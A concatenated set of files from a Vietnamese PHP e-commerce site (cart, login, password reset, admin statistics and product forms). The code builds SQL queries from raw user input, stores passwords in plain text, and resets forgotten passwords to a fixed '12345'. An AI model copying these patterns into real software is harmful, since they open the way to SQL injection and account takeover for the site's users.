<!-- favicon
============================================ -->
<link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
<!-- Bootstrap CSS
============================================ -->
<link rel="stylesheet" href="public/css/bootstrap.min.css">
<!-- Bootstrap CSS
============================================ -->
<link rel="stylesheet" href="public/css/font-awesome.min.css">
<!-- owl.carousel CSS
============================================ -->
<link rel="stylesheet" href="public/css/owl.carousel.css">
<link rel="stylesheet" href="public/css/owl.theme.css">
<link rel="stylesheet" href="public/css/owl.transitions.css">
<!-- jquery-ui CSS
============================================ -->
<link rel="stylesheet" href="public/css/jquery-ui.css">
<!-- meanmenu CSS
============================================ -->
<link rel="stylesheet" href="public/css/meanmenu.min.css">
<!-- nivoslider CSS
============================================ -->
<link rel="stylesheet" href="public/lib/css/nivo-slider.css">
<link rel="stylesheet" href="public/lib/css/preview.css">
<!-- animate CSS
============================================ -->
<link rel="stylesheet" href="public/css/animate.css">
<!-- magic CSS
============================================ -->
<link rel="stylesheet" href="public/css/magic.css">
<!-- normalize CSS
============================================ -->
<link rel="stylesheet" href="public/css/normalize.css">
<!-- main CSS
============================================ -->
<link rel="stylesheet" href="public/css/main.css">
<!-- style CSS
============================================ -->
<link rel="stylesheet" href="public/style.css">
<!-- responsive CSS
============================================ -->
<link rel="stylesheet" href="public/css/responsive.css">
<!-- modernizr JS-->
<link rel="stylesheet" type="text/css" href="public2/css/style.css">
<script src="theme/js/vendor/modernizr-2.8.3.min.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>
<?php
require_once('header/header2.php');
?>
<?php
require_once('dieuhuong.php');
?>
<?php
require_once('footer/footer.php');
?>
<!-- jquer
============================================ -->
<script src="public/js/vendor/jquery-1.12.1.min.js"></script>
<!-- bootstrap JS
============================================ -->
<script src="public/js/bootstrap.min.js"></script>
<!-- wow JS
============================================ -->
<script src="public/js/wow.min.js"></script>
<!-- price-slider JS
============================================ -->
<script src="public/js/jquery-price-slider.js"></script>
<!-- nivoslider JS
============================================ -->
<script src="theme/lib/js/jquery.nivo.slider.js"></script>
<script src="theme/lib/home.js"></script>
<!-- meanmenu JS
============================================ -->
<script src="public/js/jquery.meanmenu.js"></script>
<!-- owl.carousel JS
============================================ -->
<script src="public/js/owl.carousel.min.js"></script>
<!-- elevatezoom JS
============================================ -->
<script src="public/js/jquery.elevatezoom.js"></script>
<!-- scrollUp JS
============================================ -->
<script src="public/js/jquery.scrollUp.min.js"></script>
<!-- plugins JS
============================================ -->
<script src="public/js/plugins.js"></script>
<!-- main JS
============================================ -->
<script src="public/js/main.js"></script>
</body>
</html><file_sep>/views/giohang/giohang.php
<style>
.x:hover {
background-color: #E03550;
color: white;
}
.buttonx {
background-color: transparent;
border: 1px solid #eee;
color: #959595;
font-size: 12px;
font-weight: 500;
line-height: 34px;
padding: 10px 15px;
text-transform: uppercase;
font-family: "Montserrat", sans-serif;
transition: all 0.3s ease 0s;
}
</style>
<!-- cart item area start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="table-responsive">
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) {
echo $value['Dongia'] . '&b=';
} ?>" method="POST">
<table class="table-bordered ">
<thead>
<tr>
<th class="cart-item-img">Sản Phẩm</th>
<th class="cart-product-name">Thông tin sản phẩm</th>
<th class="edit">Đơn giá</th>
<th class="edit">Số lượng mua</th>
<th class="move-wishlist">Số lượng kho</th>
<th class="unit-price">Thành tiền</th>
<th class="remove-icon">Delete</th>
</tr>
</thead>
<tbody class="text-center">
<?php if (isset($_SESSION['sanpham'])) {
$_SESSION['tongtien'] = 0;
foreach ($_SESSION['sanpham'] as $value) {
?>
<!-- $key là id sp -->
<tr>
<td class="cart-item-img">
<a href="single-product.html">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</a>
</td>
<td class="cart-product-name">
<a href="#"><?= $value['tenSP'] ?></a>
</td>
<td class="move-wishlist">
<a href="#"><?= number_format($value['Dongia']) ?> VND</a>
</td>
<td class="unit-price">
<span>
<div class="cart_quantity_button">
<?php
if ($value['soluong_kho'] > 0) { ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php } else { ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" style="text-align:center" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</span>
</td>
<td class="quantity">
<span>
<?php
if ($value['soluong_kho'] < 0) {
echo "Lỗi";
} else {
echo $value['soluong_kho'];
}
?></span>
</td>
<td class="subtotal">
<span><?php $_SESSION['tongtien'] += $value['thanhtien'];
echo number_format($value['thanhtien']); ?> VND</span>
</td>
<td class="remove-icon">
<a href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>">
<img src="public/img/cart/btn_remove.png" alt="xoa">
</a>
</td>
</tr>
<?php
}
} ?>
</tbody>
</table>
<div class="shopping-button">
<div class="continue-shopping x">
<a class="buttonx" href="?action=trangchu">Tiếp tục mua
</a>
</div>
<div class="shopping-cart-left x">
<a class="buttonx" href="?action=giohang&act=xoagiohang_all">
Hủy giỏ hàng
</a>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<!-- <div class="col-sm-4">
<div class="discount-code">
<h3>Discount Codes</h3>
<p>Enter your coupon code if you have one.</p>
<input type="text">
<div class="shopping-button">
<button type="submit">apply coupon</button>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="estimate-shipping">
<h3>Estimate Shipping and Tax</h3>
<p>Enter your destination to get a shipping estimate.</p>
<form action="#">
<div class="form-box">
<div class="form-name">
<label> country <em>*</em> </label>
<select>
<option value="1">Afghanistan</option>
<option value="1">Algeria</option>
<option value="1">American Samoa</option>
<option value="1">Australia</option>
<option value="1">Bangladesh</option>
<option value="1">Belgium</option>
<option value="1">Bosnia and Herzegovina</option>
<option value="1">Chile</option>
<option value="1">China</option>
<option value="1">Egypt</option>
<option value="1">Finland</option>
<option value="1">France</option>
<option value="1">United State</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> State/Province </label>
<select>
<option value="1">Please select region, state or province</option>
<option value="1">Arizona</option>
<option value="1">Armed Forces Africa</option>
<option value="1">California</option>
<option value="1">Florida</option>
<option value="1">Indiana</option>
<option value="1">Marshall Islands</option>
<option value="1">Minnesota</option>
<option value="1">New Mexico</option>
<option value="1">Utah</option>
<option value="1">Virgin Islands</option>
<option value="1">West Virginia</option>
<option value="1">Wyoming</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> Zip/Postal Code </label>
<input type="text">
</div>
</div>
<div class="shopping-button">
<button type="submit">get a quote</button>
</div>
</form>
</div>
</div> -->
<div class="col-sm-4">
</div>
<div class="col-sm-4">
</div>
<div class="col-sm-4">
<div class="totals">
<!-- <p>subtotal <span>$1,540.00</span> </p> -->
<div style="display:flex; justify-content:flex-end">
<h3>Tổng Tiền <span>
<?= isset($_SESSION['tongtien']) ? number_format($_SESSION['tongtien']) . ' VND' : "0"; ?>
</span></h3>
</div>
<div class="shopping-button" style="margin-bottom: 5px;">
<button type="submit">Xác nhận thanh toán</button>
</div>
</div>
</div>
</div>
</form>
</div>
</div>
<!-- cart item area end -->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script><file_sep>/model/hoanthanhdonhang.php
<?php
require_once('ketnoi.php');
/**
*
*/
class hoanthanh_donhang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chitiet_donhang($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
$data = $this->conn->query($query)->fetch_assoc();
return $data;
}
function gui_donhang_choadmin($idUser, $idSP, $tongtien, $soluongmua, $ngaymua)
{
$query = "INSERT INTO hoadon (idUser, idSP, tongtien, soluongmua, ngaymua) VALUES ('$idUser', '$idSP', '$tongtien', '$soluongmua', '$ngaymua')";
$result = $this->conn->query($query);
}
}
?><file_sep>/views/dangnhap/quenmk.php
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Login page</strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="login-area">
<div class="container">
<!-- <div class="row">
<div class="col-xs-12">
<div class="section-title text-center">
<div class="product-tab">
<ul>
<li class="active dangnhap"><a data-toggle="tab" href="#arrival">Quên mật khẩu</a></li>
</ul>
</div>
</div>
</div>
</div> -->
<div class="text-center tab-content login">
<div class="tab-pane fade in active login-form-container" id="arrival">
<div class="wrapper">
<ul class="load-list load-list-three">
<li>
<div class="row text-center">
<div class="container">
<div class="roww">
<div class="col-xs-12 col-sm-12 col-md-4 well well-sm col-md-offset-4 onee">
<legend>
Hãy nhập thông tin của bạn
</legend>
<form action="?action=laymatkhau_submit" method="POST" class="form" role="form">
<input class="form-control" type="text" name="email_laymk" placeholder="Nhập Email của bạn">
<button class="btn btn-lg btn-primary btn-block button2" type="submit" name="submit">Lấy mật khẩu</button>
</form>
<div class="text-center">
<br>
<span> Bạn đã có tài khoản? </span>
<a class="dn" href="?action=dangnhap" title="">Đăng nhập</a>
</div>
<div class="text-center">
<br>
</div>
</div>
</div>
</div>
<center>
<span class="pull-right" style="font-size: 15px; color: blue; margin-top: -250px;">
<?php if (isset($ketqua)) {
echo 'Có tồn tại email, bạn hãy dăng nhập với mk mới là: 12345 <br> Lưu ý: bạn nên đổi mật khẩu để tăng bảo mật cho tài khoản! ';
} else {
echo "";
}
?>
</span>
</center>
</div>
</li>
</ul>
</div>
</div>
<!-- popular product end -->
</div>
</div>
</div><file_sep>/controller/home_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/show_home.php');
/**
*
*/
class showhome
{
var $home_controller;
function __construct()
{
$this->home_controller = new home();
}
public function list()
{
$data_banner = $this->home_controller->banner();
$data_loaisanpham = $this->home_controller->loaisanpham();
$data_loaisanphamhome = $this->home_controller->loaisanphamHome();
$data_allsanphamtrangchu = $this->home_controller->allsanpham_trangchu();
$data_sanphamtrangchu = $this->home_controller->sanpham_trangchu();
$data_layout = $this->home_controller->layout();
require_once('views/index.php');
}
}
?><file_sep>/admin/views_admin/trangchu/inde.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h1>THỐNG KÊ</h1>
<form action="?action=trangchu" method="POST">
<input type="date" name="ngay_gui">
<input type="submit" value="Gửi">
</form>
<br>
<div class="col-sm-4">
<div class="div1">
Doanh thu <?php echo $loai_ngay; ?><br>
- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_ngay as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu<span style="color: orange"> <?php echo $tongthu1.'.000 VND'; ?> </span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Tháng <?php echo $loai_thang; ?><br>
- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_thang as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1.'.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Năm <?php echo $loai_nam; ?><br>
- Có <?php $dem1 = 0; $tongthu1=0; foreach ($thongke_hoadon_nam as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1;?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1.'.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_user = 0;
foreach( $data_user as $value )
{
$sum_user +=1;
}
echo "Tổng tài khoản là: "."<br><span style='color:orange;'> $sum_user</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_sanpham = 0;
foreach( $data_sanpham as $value )
{
$sum_sanpham +=1;
}
echo "Tổng sản phẩm là: "."<br><span style='color:orange;'>$sum_sanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_loaisanpham = 0;
foreach( $data_loaisanpham as $value )
{
$sum_loaisanpham +=1;
}
echo "Tổng Loại sản phẩm là: "."<br><span style='color:orange;'>$sum_loaisanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_hoadon = 0;
foreach( $data_hoadon as $value )
{
$sum_hoadon +=1;
}
echo "Tổng hóa đơn là: "."<br><span style='color:orange;'>$sum_hoadon</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_banner = 0;
foreach( $data_banner as $value )
{
$sum_banner +=1;
}
echo "Tổng banner là: "."<br><span style='color:orange;'>$sum_banner</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_khuyenmai = 0;
foreach( $data_khuyenmai as $value )
{
$sum_khuyenmai +=1;
}
echo "Tổng các khuyến mãi là: "."<br><span style='color:orange;'>$sum_khuyenmai</span>";
?>
</div>
</div>
<?php if($_SESSION['admin'] == true){ ?>
<div class="col-sm-12">
<!-- <a href="?action=xoalayout" class="pull-right">Reset data layout</a> -->
<button onclick="myFunction()"><a href="#sualayout">Chỉnh sửa thông tin cửa hàng</a></button>
<p><br><br></p>
</div>
<?php }else{} ?>
<div id="myDIV" hidden>
<div class="container">
<div class="col-sm-12" style="background-color: lightgray;">
<form action="?action=sualayout" method="POST" accept-charset="utf-8">
<h3 style="margin: 30px;"><span id="sualayout"> Header - Footer </span></h3>
<?php foreach ($data_layout as $value) { ?>
<table style="margin-bottom: 70px;">
<tr>
<td style="width: 90px;"> Time</td>
<td> <input name="time" size="70" type="text" value="<?php echo $value['time'] ?>" required></td>
</tr>
<tr>
<td> Mail_1</td>
<td> <input name="mail_1" size="70" type="text" value="<?php echo $value['mail_1'] ?>" required></td>
</tr>
<tr>
<td> Mail_2</td>
<td> <input name="mail_2" size="70" type="text" value="<?php echo $value['mail_2'] ?>" required></td>
</tr>
<tr>
<td> Địa chỉ</td>
<td> <input name="diachi" size="70" type="text" value="<?php echo $value['diachi'] ?>" required></td>
</tr>
<tr>
<td> Đơn vị</td>
<td> <input name="donvi" size="70" type="text" value="<?php echo $value['donvi'] ?>" required></td>
</tr>
<tr>
<td> phone_1 </td>
<td>+84 <input name="phone_1" size="70" type="text" value="<?php echo $value['phone_1'] ?>" required></td>
</tr>
<tr>
<td> phone_2 </td>
<td>+84 <input name="phone_2" size="70" type="text" value="<?php echo $value['phone_2'] ?>" required></td>
</tr>
<tr>
<td> <input size="70" style="width: 90px;" type="submit" value="Sửa"></td>
<td></td>
</tr>
</table>
<?php } ?>
</form>
</div>
</div>
</div>
</div>
</div>
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/views/error_chuasudung.php
<!-- pages-title-start -->
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2><NAME> <NAME>I</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giới thiệu</li>
</ol>
</div>
</div>
</section>
<!-- pages-title-end -->
<!-- 404 content section start -->
<div class="pages error-page section-padding">
<div class="container text-center">
<div class="error-content">
<img src="public/img/error.png" alt="" />
<h4 style="color:red;">Error 404 - CÓ GÌ ĐÓ KHÔNG ĐÚNG</h4>
<p>Xin lỗi vì sự bất tiện này, <?php echo $database_error; ?></p>
<a href="?act=home">Trở về trang chủ</a>
</div>
</div>
</div>
<!-- 404 content section end --><file_sep>/views/slider/slider2.php
<!-- slider area start -->
<div class="slider-area home2">
<div class="bend niceties preview-2">
<div id="nivoslider" class="slides">
<?php
$tong_banner=0; foreach ($data_banner as $value) {
?>
<img src="admin/public_admin/image/banner/<?php echo $value['anh'] ?>" alt="">
<?php } ?>
</div>
<!-- direction 1 -->
<div id="slider-direction-1" class="t-cn slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-1">
<div class="title-container s-tb-c title-compress">
<h1 class="title1">Hồng An Store</h1>
<h2 class="title2">Shop hàng uy tín nhất hiện nay</h2>
<!-- <h3 class="title3">Shop hàng uy tín nhất hiện nay</h3> -->
<!-- <a href="#"><span>read more</span></a> -->
</div>
</div>
</div>
<!-- direction 2 -->
<div id="slider-direction-2" class="slider-direction">
<div class="slider-progress"></div>
<div class="slider-content t-lfl s-tb slider-2">
<div class="title-container s-tb-c">
<h1 class="title1">Hồng An Store 2</h1>
<h2 class="title2">Shop hàng uy tín nhất hiện nay</h2>
<!-- <h3 class="title3">Shop hàng uy tín nhất hiện nay</h3> -->
<!-- <a href="#"><span>read more</span></a> -->
</div>
</div>
</div>
</div>
</div>
<!-- slider area end -->
<!-- service area start -->
<div class="service-area">
<div class="container">
<div class="row">
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="theme/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="theme/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="single-service">
<div class="sirvice-img">
<img src="public/img/service/icon-1.png" alt="">
</div>
<div class="service-info">
<h3>FREE SHIPPING</h3>
<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh.</p>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- service area end --><file_sep>/admin/views_admin/sanpham/them.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Thêm sản phẩm</div>
<form action="?action=them_sanpham" method="POST" enctype="multipart/form-data">
<div class="panel-body">
<!-- rows -->
<div class="row" style="margin-top:5px;">
<div class="col-md-2">Danh mục</div>
<div class="col-md-10">
<select name="idLoaiSP" class="form-control" style="width: 300px;">
<?php foreach ($data_lsp as $value) { ?>
<?php echo "<option value='" . $value['idLoaiSP'] . "'>" . $value['tenLSP'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Khuyến mãi</div>
<div class="col-md-10">
<select name="idKM" class="form-control" style="width: 300px;">
<?php foreach ($data_km as $value) { ?>
<?php echo "<option value='" . $value['idKM'] . "'>" . $value['loaiKM'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Màu</div>
<div class="col-md-10">
<select name="idmau" class="form-control" style="width: 300px;">
<?php foreach ($data_mau as $value) { ?>
<?php echo "<option value='" . $value['idcolor'] . "'>" . $value['color'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Size</div>
<div class="col-md-10">
<select name="idsize" class="form-control" style="width: 300px;">
<?php foreach ($data_size as $value) { ?>
<?php echo "<option value='" . $value['idsize'] . "'>" . $value['size'] . "</option>"; ?>
<?php } ?>
</select>
</div>
</div>
<!-- end rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Tên sản phẩm</div>
<div class="col-md-3 " >
<input type="text" value="" name="tenSP" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Đơn giá</div>
<div class="col-md-3">
<input type="text" value="" name="Dongia" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 1</div>
<div class="col-md-3">
<input type="file" value="" name="anh1" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 2</div>
<div class="col-md-3">
<input type="file" value="" name="anh2" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ảnh 3</div>
<div class="col-md-3">
<input type="file" value="" name="anh3" required>
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Ngày nhập</div>
<div class="col-md-2">
<input type="date" value="" name="ngaynhap" required >
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Số lượng</div>
<div class="col-md-3">
<input type="text" value="" name="soluong" required class="form-control">
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:15px;">
<div class="col-md-2">Mô tả</div>
<div class="col-md-10">
<form action="_posteddata.php" method="post">
<textarea name="mota" cols="" rows=""></textarea>
<!-- <input name="ok" type="submit" value="Ok" /> -->
</form>
</div>
</div>
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</div>
</form>
</div>
</div>
<script type="text/javascript">
CKEDITOR.replace('mota');
</script><file_sep>/model/dangnhap.php
<?php
//MODEL CHO TÀI KHOẢN NGƯỜI DÙNG
require_once('ketnoi.php');
/**
*
*/
class dangnhap_dangky
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function dangky_model($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau)
{
$query= "INSERT INTO user (ho, ten, email, diachi, gioitinh, sodienthoai, tendangnhap, matkhau)
VALUES ('$ho', '$ten', '$email', '$diachi', '$gioitinh', '$sodienthoai', '$tendangnhap', '$matkhau')";
$result = $this->conn->query($query);
if($result == true){
echo "<script>";
echo "location.href='?action=dangnhap';</script>";
}
else{
echo "<script> alert('ĐĂNG KÝ KHÔNG THÀNH CÔNG');";
echo "location.href='?action=trangchu';</script>";
}
}
function dangnhap_model($tendangnhap, $matkhau)
{
$query =" SELECT * FROM user where tendangnhap='".$tendangnhap."' and matkhau = '".$matkhau."' ";
$result = $this->conn->query($query);
// $kq=mysqli_query($this->conn,$sl);
$kq = $this->conn->query($query);
$row=mysqli_fetch_array($kq);
if(mysqli_num_rows($kq)>0)
{
if($row['idQuyen'] == 1){
$_SESSION['admin'] = true;
}else{
$_SESSION['admin'] = false;
}
if($row['idQuyen'] == 2)
{
$_SESSION['banhang'] = true;
}else{
$_SESSION['banhang'] = false;
}
$_SESSION['tendangnhap']=$tendangnhap;
$_SESSION['matkhau']=$matkhau;
$_SESSION['thoigian_bd']= time(); // dùng để làm giới hạn thời gian session
// echo "<script language='javascript'>alert('Dang nhap thanh cong');";
echo "<script language='javascript'>location.href='?action=trangchu';</script>";
}
else
{
echo "<script language='javascript'>alert('Dang nhap that bai');";
echo "location.href='?action=dangnhap';</script>";
}
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function taikhoan($tendangnhap)
{
$query = "SELECT * FROM user WHERE tendangnhap = '$tendangnhap'";
return $this->conn->query($query)->fetch_assoc();
}
function suataikhoan($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap)
{
$query="UPDATE user SET ho='$ho',ten='$ten',email='$email', diachi='$diachi', gioitinh='$gioitinh', sodienthoai='$sodienthoai', tendangnhap='$tendangnhap' WHERE idUser='$idUser';";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=taikhoan');
}
}
function suamk($idUser, $matkhau_moi)
{
$query="UPDATE user SET matkhau='$matkhau_moi' WHERE idUser='$idUser' "; //loi thay doi het cac mk 12345
$result = $this->conn->query($query);
}
}
?><file_sep>/admin/views_admin/banner/sua.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Sửa Banner</div>
<div class="panel-body">
<form method="POST" action="?action=suabanner_xl" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Ảnh thay thế</div>
<div class="col-md-10">
<input type="hidden" name="idbanner" value=<?php echo $data['idbanner']; ?> >
<input type="file" name="anh" value=<?php echo $data['anh']; ?> >
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Ảnh </div>
<div class="col-md-10">
<img style="width:500px; height:200px" src="public_admin/image/banner/<?php echo $data['anh'] ?>" alt="">
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Cập nhập</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/index.php
<?php
// session_set_cookie_params(5);
session_start();
$act = isset($_GET['action']) ? $_GET['action'] : "trangchu";
switch ($act) {
//trang chủ có sẵn trang san pham moi nhất nhưng không thêm vô
case 'trangchu': //xong
require_once('controller/home_controller.php');
$index = new showhome();
$index->list();
break;
case 'cuahang': //đang
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
case 'cuahang1': //đang
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list1();
break;
//đăng nhập đăng ký, chưa xong
case 'dangky_xl':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangky();
break;
case 'dangnhap_xl':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangnhap();
break;
case 'dangxuat':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->dangxuat();
break;
case 'taikhoan':
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->taikhoan();
break;
case 'suataikhoan': //đang làm
require_once('controller/dangnhap_controller.php');
$index = new dangnhap_dangky_controller();
$index->suataikhoan();
break;
//đang làm
case 'chitietmathang':
require_once('controller/chitietmathang_controller.php');
$index = new chitietmathang();
$index->chitiet_hang();
break;
case 'gopy':
require_once('controller/chitietmathang_controller.php');
$index = new chitietmathang();
$index->gopy();
break;
//giỏ hàngg
case 'giohang':
$act = isset($_GET['act'])? $_GET['act'] : 'list';
require_once('controller/giohang_controller.php');
$index = new giohang_controller();
switch ($act) {
case 'list':
$index->list_giohang();
break;
case 'add_giohang':
$index->add_giohang();
break;
case 'update_giohang':
$index->update_giohang();
break;
case 'update_giohang_tru':
$index->update_giohang_tru();
break;
case 'xoagiohang_all':
$index->deleteall_cart();
break;
case 'xoagiohang':
$index->delete_cart();
break;
default:
$index->list_giohang();
break;
}
break;
case 'gioithieu':
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
// lấy chức năng của cuahang controller cũng đưuọc
case 'dangnhap':
require_once('controller/cuahang_controller.php');
$index = new showcuahang();
$index->list();
break;
case 'quenmatkhau':
require_once('controller/quenmatkhau_controller.php');
$index = new quenmk();
$index->list();
break;
case 'laymatkhau_submit':
require_once('controller/quenmatkhau_controller.php');
$index = new quenmk();
$index->laymk();
break;
case 'thanhtoan':
require_once('controller/thanhtoan_controller.php');
$index = new showthanhtoan();
$index->list();
break;
case 'hoanthanhdonhang':
require_once('controller/hoanthanhdonhang_controller.php');
$index = new hoanthanhdonhang();
$index->list();
break;
case 'huy_session':
require_once('controller/hoanthanhdonhang_controller.php');
$index = new hoanthanhdonhang();
$index->huy_session();
break;
default:
require_once('controller/home_controller.php');
$index = new showhome();
$index->list();
break;
}
// echo $_SESSION['thoigian_bd'];
// echo "<br>";
// echo $_SESSION['thoigian_bd'] - time();
// Thiết lập thời gian là một ngày để hủy các SESSION, dòng 66 model->dangnhap.php
if(isset($_SESSION['tendangnhap'])){
if(time() - $_SESSION['thoigian_bd'] > 3600){ //1 tiếng có 60x60 =3600 giây, 24 tiếng có 3600x24=86400
unset($_SESSION['banhang']);
unset($_SESSION['tendangnhap']);
unset($_SESSION['matkhau']);
unset($_SESSION['thoigian_bd']);
// hủy session giỏ hàng
unset($_SESSION['sanpham']);
unset($_SESSION['thanhtien']);
unset($_SESSION['tongtien']);
}
}
?><file_sep>/admin/views_admin/taikhoan/Quanlytaikhoan.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=them_giaodien" class="btn btn-primary">Thêm tài khoản</a>
<?php } else {
} ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách tài khoản</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Mã NV</th>
<th style="text-align:center;">Họ</th>
<th style="text-align:center;">Tên</th>
<th style="text-align:center;">Số ĐT</th>
<th style="text-align:center;">Email</th>
